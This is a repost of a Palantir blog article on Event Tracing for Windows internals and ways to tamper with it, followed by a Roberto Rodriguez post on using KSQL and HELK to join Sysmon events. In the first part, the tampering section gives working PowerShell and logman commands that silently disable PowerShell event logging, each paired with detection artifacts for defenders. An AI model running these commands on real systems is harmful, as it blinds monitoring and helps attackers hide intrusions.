Tampering with Windows Event Tracing: Background, Offense, and Defense

( Original text by Palantir )

Event Tracing for Windows (ETW) is the mechanism Windows uses to trace and log system events. Attackers often clear event logs to cover their tracks. Though the act of clearing an event log itself generates an event, attackers who know ETW well may take advantage of tampering opportunities to cease the flow of logging temporarily or even permanently, without generating any event log entries in the process.

The Windows event log is the data source for many of the Palantir Critical Incident Response Team’s Alerting and Detection Strategies, so familiarity with event log tampering tradecraft is foundational to our success. We continually evaluate our assumptions regarding the integrity of our event data sources, document our blind spots, and adjust our implementation. The goal of this blog post is to share our knowledge with the community by covering ETW background and basics, stealthy event log tampering techniques, and detection strategies.

Introduction to ETW and event logging

The ETW architecture differentiates between event providers, event consumers, and event tracing sessions. Tracing sessions are responsible for collecting events from providers and for relaying them to log files and consumers. Sessions are created and configured by controllers like the built-in logman.exe command line utility. Here are some useful commands for exploring existing trace sessions and their respective ETW providers; note that these must usually be executed from an elevated context.

List all running trace sessions

> logman query -ets
Data Collector Set                Type    Status
Circular Kernel Context Logger Trace Running
AppModel Trace Running
ScreenOnPowerStudyTraceSession Trace Running
DiagLog Trace Running
EventLog-Application Trace Running
EventLog-System Trace Running
LwtNetLog Trace Running
NtfsLog Trace Running
TileStore Trace Running
UBPM Trace Running
WdiContextLog Trace Running
WiFiSession Trace Running
UserNotPresentTraceSession Trace Running
Diagtrack-Listener Trace Running
WindowsUpdate_trace_log Trace Running

List all providers that a trace session is subscribed to

> logman query "EventLog-Application" -ets
Name:                 EventLog-Application
Status: Running
Root Path: %systemdrive%\PerfLogs\Admin
Segment: Off
Schedules: On
Segment Max Size: 100 MB

Name: EventLog-Application\EventLog-Application
Type: Trace
Append: Off
Circular: Off
Overwrite: Off
Buffer Size: 64
Buffers Lost: 0
Buffers Written: 242
Buffer Flush Timer: 1
Clock Type: System
File Mode: Real-time

Name: Microsoft-Windows-SenseIR
Provider Guid: {B6D775EF-1436-4FE6-BAD3-9E436319E218}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x8000000000000000 (Microsoft-Windows-SenseIR/Operational)
Properties: 65
Filter Type: 0

Name: Microsoft-Windows-WDAG-Service
Provider Guid: {728B02D9-BF21-49F6-BE3F-91BC06F7467E}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x8000000000000000
Properties: 65
Filter Type: 0


Name: Microsoft-Windows-PowerShell
Provider Guid: {A0C1853B-5C40-4B15-8766-3CF1C58F985A}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x9000000000000000 (Microsoft-Windows-PowerShell/Operational,Microsoft-Windows-PowerShell/Admin)
Properties: 65
Filter Type: 0

This command details the configuration of the trace session itself, followed by the configuration of each provider that the session is subscribed to, including the following parameters:

  • Name: The name of the provider. A provider only has a name if it has a registered manifest, but it always has a unique GUID.
  • Provider GUID: The unique GUID for the provider. The GUID and/or name of a provider is useful when performing research or operations on a specific provider.
  • Level: The logging level specified. Standard logging levels are: 0 (Log Always); 1 (Critical); 2 (Error); 3 (Warning); 4 (Informational); 5 (Verbose). Custom logging levels can also be defined, but levels 6–15 are reserved. The level acts as a threshold rather than a bitmask: a session receives events whose level is less than or equal to the specified value, so supplying 255 (0xFF) is the standard method of capturing all supported logging levels.
  • KeywordsAll: Keywords are used to filter specific categories of events. While logging level is used to filter by event verbosity/importance, keywords allow filtering by event category. A keyword corresponds to a specific bit value. All indicates that, for a given keyword matched by KeywordsAny, further filtering should be performed based on the specific bitmask in KeywordsAll. This field is often set to zero. More information on All vs. Any can be found here.
  • KeywordsAny: Enables filtering based on any combination of the keywords specified. This can be thought of as a logical OR where KeywordsAll is a subsequent application of a logical AND. The low 6 bytes refer to keywords specific to the provider. The high two bytes are reserved and defined in WinMeta.xml in the Windows SDK. For example, in event log-related trace sessions, you will see the high byte (specifically, the high nibble) set to a specific value. This corresponds to one or more event channels where the following channels are defined:
0x01 - Admin channel
0x02 - Debug channel
0x04 - Analytic channel
0x08 - Operational channel
  • Properties: This refers to optional ETW properties that can be specified when writing the event. The following values are currently supported (more information here):

From a detection perspective, EVENT_ENABLE_PROPERTY_SID, EVENT_ENABLE_PROPERTY_TS_ID, EVENT_ENABLE_PROPERTY_PROCESS_START_KEY are valuable fields to collect. For example, EVENT_ENABLE_PROPERTY_PROCESS_START_KEY generates a value that uniquely identifies a process. Note that Process IDs are not unique identifiers for a process instance.

  • Filter Type: Providers can optionally choose to implement additional filtering; supported filters are defined in the provider manifest. In practice, none of the built-in providers implement filters, as confirmed by running TdhEnumerateProviderFilters over all registered providers. Some predefined filter types are defined in eventprov.h (in the Windows SDK).
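
The KeywordsAny and Properties fields described above are bitmasks, so the numbers printed by logman can be decoded mechanically. The following is a minimal Python sketch, not part of any Windows tooling: the property flag values are taken from evntrace.h in the Windows SDK, the channel bits are the ones listed in this post, and the function names are hypothetical.

```python
# Enable-property flags as defined in evntrace.h (Windows SDK).
ENABLE_PROPERTIES = {
    0x01: "EVENT_ENABLE_PROPERTY_SID",
    0x02: "EVENT_ENABLE_PROPERTY_TS_ID",
    0x04: "EVENT_ENABLE_PROPERTY_STACK_TRACE",
    0x08: "EVENT_ENABLE_PROPERTY_PSM_KEY",
    0x10: "EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0",
    0x20: "EVENT_ENABLE_PROPERTY_PROVIDER_GROUP",
    0x40: "EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0",
    0x80: "EVENT_ENABLE_PROPERTY_PROCESS_START_KEY",
}

# Channel bits in the high nibble of the keyword, as listed in this post.
CHANNEL_BITS = {0x1: "Admin", 0x2: "Debug", 0x4: "Analytic", 0x8: "Operational"}


def decode_properties(value):
    """Return the names of all enable-property flags set in `value`."""
    return [name for bit, name in sorted(ENABLE_PROPERTIES.items()) if value & bit]


def decode_channels(keywords_any):
    """Return the channel names encoded in the high nibble of a 64-bit keyword."""
    high_nibble = (keywords_any >> 60) & 0xF
    return [name for bit, name in sorted(CHANNEL_BITS.items()) if high_nibble & bit]


def provider_keywords(keywords_any):
    """Return only the low 6 bytes, which hold provider-specific keywords."""
    return keywords_any & 0x0000FFFFFFFFFFFF


# "Properties: 65" and the PowerShell KeywordsAny value from the listing above.
print(decode_properties(65))
print(decode_channels(0x9000000000000000))
```

Applied to the EventLog-Application listing, 65 (0x41) decodes to the SID and ENABLE_KEYWORD_0 flags, and the PowerShell value 0x9000000000000000 decodes to the Admin and Operational channels, which agrees with the channel names logman printed next to it.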

Enumerating all registered ETW providers

The logman query providers command lists all registered ETW providers, supplying their name and GUID. An ETW provider is registered if it has a binary manifest stored in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{PROVIDER_GUID} registry key. For example, the Microsoft-Windows-PowerShell provider has the following registry values:
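
The values under a provider's Publishers key can also be read programmatically. Below is a rough Python sketch using the standard-library winreg module; it only runs on Windows, the function names are hypothetical, and it makes no assumption about which value names are present beyond what the registry returns.

```python
PUBLISHERS_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers"


def publisher_key_path(provider_guid):
    """Build the HKLM-relative registry path for a provider GUID."""
    guid = provider_guid.strip().strip("{}").lower()
    return PUBLISHERS_KEY + "\\{" + guid + "}"


def read_publisher_values(provider_guid):
    """Return every value stored under the provider's key (Windows only)."""
    import winreg  # imported lazily so the path helper works on any platform

    values = {}
    path = publisher_key_path(provider_guid)
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
        value_count = winreg.QueryInfoKey(key)[1]
        for index in range(value_count):
            name, data, _value_type = winreg.EnumValue(key, index)
            values[name or "(Default)"] = data
    return values
```

On a Windows host, calling read_publisher_values('{A0C1853B-5C40-4B15-8766-3CF1C58F985A}') should return the values registered for the Microsoft-Windows-PowerShell provider, including the ResourceFileName value discussed next.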

ETW and the event log know how to properly parse and display event information to a user based on binary-serialized information in the WEVT_TEMPLATE resource present in the binaries listed in the ResourceFileName registry value. This resource is a binary representation of an instrumentation manifest (i.e., the schema for an ETW provider). The binary structure of WEVT_TEMPLATE is under-documented, but at least two tools can assist in parsing and recovering event schemas: WEPExplorer and PerfView.

Viewing an individual provider

The logman tool prints basic information about a provider. For example:

The listing shows supported keywords and logging values, as well as all processes that are registered to emit events via this provider. This output is useful for understanding how existing trace sessions filter on providers. It is also useful for initial discovery of potentially interesting information that could be gathered via an ETW trace.

Notably, the PowerShell provider appears to support logging to the event log based on the existence of the reserved keywords in the high nibble of the defined keywords. Not all ETW providers are designed to be ingested into the event log; rather, many ETW providers are intended to be used solely for low-level tracing, debugging, and more recently-developed security telemetry purposes. For example, Windows Defender Advanced Threat Protection relies heavily upon ETW as a supplemental detection data source.

Viewing all providers that a specific process is sending events to

Another method for discovering potentially interesting providers is to view all providers to which events are written from a specific process. For example, the following listing shows all providers relevant to MsMpEng.exe (the Windows Defender service, running as pid 5244 in this example):

Entries listed with only a GUID are providers lacking a manifest. They will typically be related to WPP or TraceLogging, both of which are beyond the scope of this blog post. It is possible to retrieve provider names and event metadata for these provider types. For example, here are some of the resolved provider names from the unnamed providers above:

  • 05F95EFE-7F75-49C7-A994-60A55CC09571
  • 072665FB-8953-5A85-931D-D06AEAB3D109
  • 7AF898D7-7E0E-518D-5F96-B1E79239484C

Event provider internals

Looking at ETW-related code snippets in built-in Windows binaries can help you understand how ETW events are constructed and how they surface in event logs. Below, we highlight code from two binaries: System.Management.Automation.dll (the core PowerShell assembly) and amsi.dll.

System.Management.Automation.dll event tracing

One of the great security features of PowerShell version 5 is scriptblock autologging; when enabled, script content is automatically logged to the Microsoft-Windows-PowerShell/Operational event log with event ID 4104 (warning level) if the scriptblock contains any suspicious terms. The following C# code is executed to generate the event log:

From PowerShell

The LogOperationalWarning method is implemented as follows:

From PowerShell

The WriteEvent method is implemented as follows:

From PowerShell

Finally, the event information is marshaled and EventWriteTransfer is called, supplying the Microsoft-Windows-PowerShell provider with event data.

The relevant data supplied to EventWriteTransfer is as follows:

  • Microsoft-Windows-PowerShell provider GUID: {A0C1853B-5C40-4b15-8766-3CF1C58F985A}
  • Event ID: PSEventId.ScriptBlock_Compile_Detail - 4104
  • Channel value: PSChannel.Operational - 16
    Again, the usage of a channel value indicates that the provider is intended to be used with the event log. The operational channel definition for the PowerShell ETW manifest can be seen here. When an explicit channel value is not supplied, Message Compiler (mc.exe) will assign a default value starting at 16. Since the operational channel was defined first, it was assigned 16.
  • Opcode value: PSOpcode.Create - 15
  • Logging level: PSLevel.Warning - 3
  • Task value: PSTask.CommandStart - 102
  • Keyword value: PSKeyword.UseAlwaysAnalytic - 0x4000000000000000
    This value is later translated to 0 as seen in the code block above. Normally, this event would not be logged, but the Application event log trace session specifies the EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 Enable flag for all of its providers, which causes the event to be logged despite a keyword value not being specified.
  • Event data: the scriptblock contents and event fields

Upon receiving the event from the PowerShell ETW provider, the event log service parses the binary WEVT_TEMPLATE schema (original XML schema) and presents human-readable, parsed event properties/fields:

amsi.dll event tracing

You may have observed that Windows 10 has an AMSI/Operational event log that is typically empty. To understand why events are not logged to this event log, you would first have to inspect how data is fed to the AMSI ETW provider (Microsoft-Antimalware-Scan-Interface - {2A576B87-09A7-520E-C21A-4942F0271D67}) and then observe how the Application event log trace session (EventLog-Application) subscribes to the AMSI ETW provider. Let’s start by looking at the provider registration in the Application event log. The following PowerShell cmdlet will supply us with this information:

> Get-EtwTraceProvider -SessionName EventLog-Application -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}'
SessionName     : EventLog-Application
Guid : {2A576B87-09A7-520E-C21A-4942F0271D67}
Level : 255
MatchAnyKeyword : 0x8000000000000000
MatchAllKeyword : 0x0

The following properties should be noted:

  • Operational channel events (as indicated by 0x8000000000000000 in the MatchAnyKeyword value) are captured.
  • All logging levels are captured.
  • Events should be captured even if an event keyword value is zero as indicated by the EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 flag.

This information on its own does not explain why AMSI events are not logged, but it supplies needed context for inspecting how amsi.dll writes events to ETW. By loading amsi.dll into IDA, we can see that there is a single call to the EventWrite function within the internal CAmsiAntimalware::GenerateEtwEvent function:

The relevant portion of the call to EventWrite is the EventDescriptor argument. Upon applying the EVENT_DESCRIPTOR structure type to _AMSI_SCANBUFFER, the following information was interpreted:

The EVENT_DESCRIPTOR context gives us the relevant information:

  • Event ID: 1101 (0x44D)
    This event's details can be extracted from a recovered manifest as seen here.
  • Channel: 16 (0x10) referring to the operational event log channel
  • Level: 4 (Informational)
  • Keyword: 0x8000000000000001 (AMSI/Operational OR Event1). These values are interpreted by running the logman query providers Microsoft-Antimalware-Scan-Interface command.
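
To make the structure interpretation above concrete, here is a small Python sketch that unpacks a 16-byte EVENT_DESCRIPTOR using the field layout from the Windows SDK (Id, Version, Channel, Level, Opcode, Task, Keyword). The sample bytes are built from the values listed above; the Version, Opcode, and Task values are not given in this post and are set to 0 purely as placeholders.

```python
import struct
from collections import namedtuple

# EVENT_DESCRIPTOR layout: USHORT Id; UCHAR Version; UCHAR Channel;
# UCHAR Level; UCHAR Opcode; USHORT Task; ULONGLONG Keyword (16 bytes).
EVENT_DESCRIPTOR = struct.Struct("<HBBBBHQ")
EventDescriptor = namedtuple(
    "EventDescriptor", "id version channel level opcode task keyword"
)


def parse_event_descriptor(raw):
    """Interpret the first 16 bytes of `raw` as an EVENT_DESCRIPTOR."""
    return EventDescriptor(*EVENT_DESCRIPTOR.unpack(raw[:EVENT_DESCRIPTOR.size]))


# Sample bytes assembled from the values in this post.
# Version, Opcode and Task are placeholders (0), not recovered values.
sample = EVENT_DESCRIPTOR.pack(1101, 0, 16, 4, 0, 0, 0x8000000000000001)

descriptor = parse_event_descriptor(sample)
print(descriptor.id, descriptor.channel, descriptor.level, hex(descriptor.keyword))
```

The same approach works on bytes copied out of a disassembler: paste the 16 bytes at the descriptor's address into a bytes literal and pass them to parse_event_descriptor.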

We now understand that 1101 events are not logged to the Application event log because it only considers events where the keyword value matches 0x8000000000000000. To fix this issue and get events pumping into the event log, either the Application event log trace session would need to be modified (not recommended, and it requires SYSTEM privileges) or you could create your own persistent trace session (e.g., an autologger) to capture AMSI events in the event log. The following PowerShell script creates such a trace session:

$AutoLoggerGuid = "{$((New-Guid).Guid)}"
New-AutologgerConfig -Name MyCustomAutoLogger -Guid $AutoLoggerGuid -Start Enabled
Add-EtwTraceProvider -AutologgerName MyCustomAutoLogger -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41

After running the above commands and rebooting, the AMSI event log will begin to populate.

Some additional reverse engineering showed that the scanResult field refers to the AMSI_RESULT enum where, in this case, 32768 maps to AMSI_RESULT_DETECTED, indicating that the buffer (the Unicode encoded buffer in the content field) was determined to be malicious.

Without knowledge of ETW internals, a defender would not have been able to determine that additional data sources (the AMSI log in this case) can be fed into the event log. One would have to resort to speculation as to how the AMSI event log came to be misconfigured and whether or not the misconfiguration was intentional.

ETW tampering techniques

If the goal of an attacker is to subvert event logging, ETW provides a stealthy mechanism to affect logging without itself generating an event log trail. Below is a non-exhaustive list of tampering techniques that an attacker can use to cut off the supply of events to a specific event log.

Tampering techniques can generally be broken down into two categories:

  1. Persistent, requiring reboot — i.e., a reboot must occur before the attack takes effect. Changes can be reverted, but would require another reboot. These attacks involve altering autologger settings — persistent ETW trace sessions with settings in the registry. There are more types of persistent attacks than ephemeral attacks, and they are usually more straightforward to detect.
  2. Ephemeral — i.e., where the attack can take place without a reboot.

Autologger provider removal

Tampering category: Persistent, requiring reboot
Minimum permissions required: Administrator
Detection artifacts: Registry key deletion: HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}

Description: This technique involves the removal of a provider entry from a configured autologger. Removing a provider registration from an autologger will cause events to cease to flow to the respective trace session.
Example: The following PowerShell code disables Microsoft-Windows-PowerShell event logging:

Remove-EtwTraceProvider -AutologgerName EventLog-Application -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'

In the above example, A0C1853B-5C40-4B15-8766-3CF1C58F985A refers to the Microsoft-Windows-PowerShell ETW provider. This command will end up deleting the HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\{a0c1853b-5c40-4b15-8766-3cf1c58f985a} registry key.

Provider “Enable” property modification

Tampering category: Persistent, requiring reboot
Minimum permissions required: Administrator
Detection artifacts: Registry value modification: HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID} - EnableProperty (REG_DWORD)

Description: This technique involves altering the Enable property of a provider in an autologger session. For example, by default, all ETW provider entries in the EventLog-Application autologger session are set to 0x41, which translates to EVENT_ENABLE_PROPERTY_SID and EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0. EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 is not documented; it specifies that any events generated for a provider should be logged even if the keyword value is set to 0. An attacker could swap out EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 for EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0, resulting in a value of 0x11, which would cause all events where the keyword is 0 not to be logged. For example, PowerShell eventing supplies a 0 keyword value with its events, resulting in no logging to the PowerShell event log.
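
The arithmetic behind the 0x41 and 0x11 values can be checked with a few lines of Python. This is only an illustrative sketch of the flag swap and of how a zero-keyword event is treated under each setting; it does not model the rest of ETW's keyword and level matching, and the helper names are hypothetical.

```python
# Flag values from evntrace.h (Windows SDK).
EVENT_ENABLE_PROPERTY_SID = 0x01
EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0 = 0x10
EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 = 0x40


def swap_keyword0_flag(enable_property):
    """Replace ENABLE_KEYWORD_0 with IGNORE_KEYWORD_0, keeping other flags."""
    cleared = enable_property & ~EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0
    return cleared | EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0


def zero_keyword_event_logged(enable_property):
    """Events whose keyword is 0 are dropped once IGNORE_KEYWORD_0 is set."""
    return not (enable_property & EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0)


default_value = EVENT_ENABLE_PROPERTY_SID | EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0
tampered_value = swap_keyword0_flag(default_value)

print(hex(default_value), zero_keyword_event_logged(default_value))    # 0x41 True
print(hex(tampered_value), zero_keyword_event_logged(tampered_value))  # 0x11 False
```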

Example: The following PowerShell code disables Microsoft-Windows-PowerShell event logging:

Set-EtwTraceProvider -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}' -AutologgerName 'EventLog-Application' -Property 0x11

In the above example, A0C1853B-5C40-4B15-8766-3CF1C58F985A refers to the Microsoft-Windows-PowerShell ETW provider. This command will end up setting HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\EnableProperty to 0x11. Upon rebooting, events will cease to be reported to the PowerShell event log.
An attacker is not constrained to using just the Set-EtwTraceProvider cmdlet to carry out this attack. An attacker could just modify the value directly in the registry. Set-EtwTraceProvider offers a convenient autologger configuration abstraction.

Alternative detection artifacts/ideas: If possible, it is advisable to monitor for modifications of values within the HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID} registry key. Note that modifying EnableProperty is just one specific example and that an attacker can alter ETW providers in other ways, too.
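
One way to act on this advice is to compare periodic snapshots of an autologger's provider subkeys. The Python sketch below assumes a hypothetical snapshot format (a dictionary mapping each provider GUID to its registry values) and leaves the collection of those snapshots to whatever registry tooling you already use; it reports both removed providers and changed values.

```python
def diff_autologger(baseline, current):
    """Compare two snapshots of {provider_guid: {value_name: value}}.

    Returns a list of (finding_type, provider_guid, detail) tuples.
    """
    findings = []
    for guid, old_values in baseline.items():
        if guid not in current:
            # The provider subkey was deleted (autologger provider removal).
            findings.append(("provider_removed", guid, None))
            continue
        for name, old in old_values.items():
            new = current[guid].get(name)
            if new != old:
                # A value such as EnableProperty was modified or deleted.
                findings.append(("value_changed", guid, (name, old, new)))
    return findings


# Hypothetical snapshots of the EventLog-Application autologger.
POWERSHELL = "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"
AMSI = "{2a576b87-09a7-520e-c21a-4942f0271d67}"

baseline = {POWERSHELL: {"EnableProperty": 0x41}, AMSI: {"EnableProperty": 0x41}}
current = {POWERSHELL: {"EnableProperty": 0x11}}

for finding in diff_autologger(baseline, current):
    print(finding)
```

Because both persistent techniques only take effect after a reboot, a comparison of this kind run before the next restart could flag the change while logging is still intact.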

ETW provider removal from a trace session

Tampering category: Ephemeral
Minimum permissions required: SYSTEM
Detection artifacts: Unfortunately, no file, registry, or event log artifacts are associated with this event. While the technique example below indicates that logman.exe was used to perform the attack, an attacker can obfuscate their techniques by using Win32 APIs directly, WMI, DCOM, PowerShell, etc.
Description: This technique involves removing an ETW provider from a trace session, cutting off its ability to supply a targeted event log with events until a reboot occurs, or until the attacker restores the provider. While an attacker must have SYSTEM privileges to perform this attack, it is unlikely that defenders will notice such an attack if they rely on event logs for threat detection.
Example: The following command immediately disables Microsoft-Windows-PowerShell event logging until a reboot occurs or the attacker restores the ETW provider:

logman update trace EventLog-Application --p Microsoft-Windows-PowerShell -ets

Alternative detection artifacts/ideas:

  • Event ID 12 within the Microsoft-Windows-Kernel-EventTracing/Analytic log indicates when a trace session is modified, but it doesn’t supply the provider name or GUID that was removed, so it would be difficult to confidently determine whether or not something suspicious occurred using this event.
  • There have been several references thus far to the ETW PowerShell cmdlets housed in the EventTracingManagement module, which itself is a CDXML-based module. This means that all the cmdlets in the EventTracingManagement module are backed by WMI classes. For example, the Get-EtwTraceProvider cmdlet is backed by the ROOT/Microsoft/Windows/EventTracingManagement:MSFT_EtwTraceProvider class. Considering ETW providers can be represented in the form of WMI class instances, you could craft a permanent WMI event subscription that logs all provider removals from a specific trace session to the event log. This code sample creates an NtEventLogEventConsumer instance that logs event ID 8 to the Application event log (source: WSH) any time a provider is removed from the Application event log trace session, EventLog-Application. The logged event looks like the following:
  • The frequency at which providers are removed from Application event logs in large environments is not currently known. As a fallback, it is still advised to log the execution of logman.exe, wpr.exe, and PowerShell in your environment.


Identifying blind spots and assumptions in Alerting and Detection Strategies is a crucial step in ensuring the resilience of detections. Since ETW is at the core of the event logging infrastructure, gaining an in-depth understanding of ETW tampering attacks is a valuable way to increase the integrity of security-related data sources.


Real-Time Sysmon Processing via KSQL and HELK — Part 1: Initial Integration

( Original text by Roberto Rodriguez )

During a recent talk titled “Hunters ATT&CKing with the Right Data” that I gave with my brother Jose Luis Rodriguez @Cyb3rPandaH at ATT&CKcon, we talked about the importance of documenting and modeling security event logs before developing any data analytics while preparing for a threat hunting engagement. Defining relationships among Windows security event logs such as Sysmon, for example, helped us to appreciate the extra context that two or more events together can provide for a hunt. Therefore, I was wondering if there was anything that I could do with my project HELK to apply some of the relationships presented in our talk, and enrich the data collected from my endpoints in real-time.

This post is part of a three-part series. In this first one, I will introduce the initial integration of a new application named KSQL into the HELK ecosystem in order to enable a SQL interface for stream processing on top of the Kafka platform already provided by HELK. In the other two posts, I will go over a basic example of a JOIN statement with Sysmon Event ID 1 (Process Creation) and Sysmon Event ID 3 (Network Connection), and show you how useful it could be during a hunting engagement. The other two parts can be found in the following links:

What is KSQL?

KSQL is the open source streaming SQL engine for Apache Kafka®. It provides an easy-to-use yet powerful interactive SQL interface for stream processing on Kafka, without the need to write code in a programming language such as Java or Python. KSQL is scalable, elastic, fault-tolerant, and real-time. It supports a wide range of streaming operations, including data filtering, transformations, aggregations, joins, windowing, and sessionization.

KSQL is implemented on top of the Kafka Streams API, which means that KSQL queries are compiled into Kafka Streams applications.

What is “Kafka Streams”?

Kafka Streams is a JVM client library to develop stream processing applications that leverage data stored in Kafka clusters. Remember that stream processing applications do not run inside of Kafka nodes. Instead, Kafka Streams applications read from topics available in Kafka nodes, process the data on their own internal stream processors, and write the results back to the same or new topic in the Kafka cluster.

This concept is what makes KSQL flexible and easy to use with current Kafka cluster deployments.

What is a Stream?

A stream is the most important abstraction provided by Kafka Streams: it represents an unbounded, continuously updating data set, where unbounded means “of unknown or of unlimited size”.

Think of a stream as a sequence of data records ordered by time in a key-value format that can be queried for further analysis. One example could be messages from a Kafka topic that stores information about process creations on specific endpoints in your network as shown below.

KSQL: SQL interface for stream processing?

Essentially, KSQL allows you to easily execute SQL-like queries on top of streams flowing from Kafka topics. KSQL queries get translated to Java code via the Kafka Streams API, which spares you from writing many lines of Java for real-time stream processing. Our basic design then would look like the following:


Now that we have gained some understanding of KSQL, let’s define one of the SQL capabilities provided by KSQL that will be helpful for this post: a SQL JOIN. KSQL join operations merge streams and/or tables on common data key values, producing new streams or tables in real-time.

Streams vs Tables

Once again, a stream is a never-ending sequence of data records ordered by time that represents the past and the present state of data ingested to a Kafka topic. One can access a stream from the beginning of its time all the way to the most recently recorded values. Tables, on the other hand, represent only the up-to-date state of data records. For example, if DHCP logs are being collected, you can have a table that keeps the most up-to-date mapping between an IP address and a domain computer in your environment. Meanwhile, you can query the DHCP logs stream and access past IP addresses assigned to workstations in your network.
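
The DHCP example can be mimicked in a few lines of plain Python. This is only a conceptual sketch with made-up lease records; it does not use Kafka or KSQL, but it shows how the same records yield a full history when read as a stream and only the latest value per key when read as a table.

```python
# A stream: every record is kept, in arrival order (hypothetical DHCP leases).
dhcp_stream = [
    ("10.0.0.5", "WKS01"),
    ("10.0.0.6", "WKS02"),
    ("10.0.0.5", "WKS03"),  # 10.0.0.5 is later reassigned to another host
]


def to_table(stream):
    """Collapse a stream into a table holding the latest value per key."""
    table = {}
    for key, value in stream:
        table[key] = value  # newer records overwrite older ones
    return table


def history(stream, key):
    """Return every value a key has had, oldest first."""
    return [value for record_key, value in stream if record_key == key]


dhcp_table = to_table(dhcp_stream)
print(dhcp_table["10.0.0.5"])           # WKS03
print(history(dhcp_stream, "10.0.0.5"))  # ['WKS01', 'WKS03']
```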

According to the Confluent Developers Guide, you can join streams and tables in the following way:


Inner Join: It returns data records that have matching values in both sources

Left Outer Join: It returns data records from the left source and the matched data records from the right source

Full Outer Join: It returns data records when there is a match in either left or right source
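
The three join types can be illustrated with plain Python dictionaries keyed on the join key. This sketch uses made-up records and ignores details of real KSQL joins such as time windows; it is meant only to show which keys each join type keeps.

```python
def inner_join(left, right):
    """Keep only keys present in both sources."""
    return {key: (left[key], right[key]) for key in left if key in right}


def left_outer_join(left, right):
    """Keep every left key; the right side is None when there is no match."""
    return {key: (left[key], right.get(key)) for key in left}


def full_outer_join(left, right):
    """Keep every key from either source; the missing side is None."""
    return {key: (left.get(key), right.get(key)) for key in {**left, **right}}


# Hypothetical records keyed by a shared identifier.
left = {"a": "proc-A", "b": "proc-B"}
right = {"b": "conn-B", "c": "conn-C"}

print(inner_join(left, right))       # {'b': ('proc-B', 'conn-B')}
print(left_outer_join(left, right))
print(full_outer_join(left, right))
```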

I hope this small review of KSQL and the concepts around Kafka Streams was helpful in familiarizing you with the technology being added to the HELK.

Why KSQL and HELK?

As I mentioned at the beginning of this post, I wanted to find a way to enrich Windows Sysmon event logs by applying the relationships identified within the information it provides. From an infrastructure perspective, I already collect Sysmon event logs from my Windows endpoints and publish them directly to a Kafka topic named winlogbeat in HELK. Therefore, after what we just learned about KSQL, it will be very easy to use it with the current HELK Kafka deployment and apply a Sysmon data model via join operations in real-time.

What is a data model?

A data model in general determines the structure of data objects present in a data set and the relationships identified among them. From a security events perspective, data objects can be entities provided in event logs such as a “User”, a “Host”, a “Process”, a “File” or even an “IP address”. Like any other data object, they also have properties such as “user_name”, “host_name”, “process_name” or “file_name”, and depending on the information provided by each event log, relationships can be defined among those data objects as shown below:

Modeling data objects identified in security event logs helps security analysts to identify the right data sources and correlations that can be used for the development of data analytics.

What is the “Sysmon Data Model”?

Windows Sysmon event logs provide information about several data objects such as “Processes”, “IP Addresses”, “Files”, “Registry Keys”, and even “Named Pipes”. In addition, most of their data objects have a common property named ProcessGUID that defines direct relationships among specific Sysmon events. According to my teammates Matt Graeber and Lee Christensen, in their recent white paper “Subverting Sysmon”, the ProcessGUID is a unique value derived from the machine GUID, process start time, and process token ID that can be used to correlate other related events. After documenting the relationships among Sysmon events and data objects based on their ProcessGUID property, the following data model is possible:

As we already know, KSQL join operations happen on common unique data key values. Therefore, the ProcessGUID property can be used to join Sysmon events. For the purpose of this post, we will join ProcessCreate (Event ID 1) and NetworkConnect (Event ID 3) events.
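
Conceptually, the join described here looks like the following Python sketch. It is not KSQL and does not talk to Kafka; the field names (event_id, process_guid, image, command_line, destination_ip, destination_port) and the sample events are assumptions made for illustration, and real Sysmon records shipped by Winlogbeat will be named and nested differently.

```python
def enrich_network_events(events):
    """Yield NetworkConnect records merged with their ProcessCreate record."""
    process_by_guid = {}
    for event in events:
        if event["event_id"] == 1:      # ProcessCreate
            process_by_guid[event["process_guid"]] = event
        elif event["event_id"] == 3:    # NetworkConnect
            process = process_by_guid.get(event["process_guid"])
            if process is not None:     # inner join: skip unmatched connections
                yield {
                    "process_guid": event["process_guid"],
                    "image": process["image"],
                    "command_line": process["command_line"],
                    "destination_ip": event["destination_ip"],
                    "destination_port": event["destination_port"],
                }


# Hypothetical events in arrival order.
events = [
    {"event_id": 1, "process_guid": "{guid-1}", "image": "powershell.exe",
     "command_line": "powershell.exe -nop"},
    {"event_id": 3, "process_guid": "{guid-1}",
     "destination_ip": "192.0.2.10", "destination_port": 443},
    {"event_id": 3, "process_guid": "{guid-2}",
     "destination_ip": "192.0.2.20", "destination_port": 80},
]

joined = list(enrich_network_events(events))
print(joined)
```

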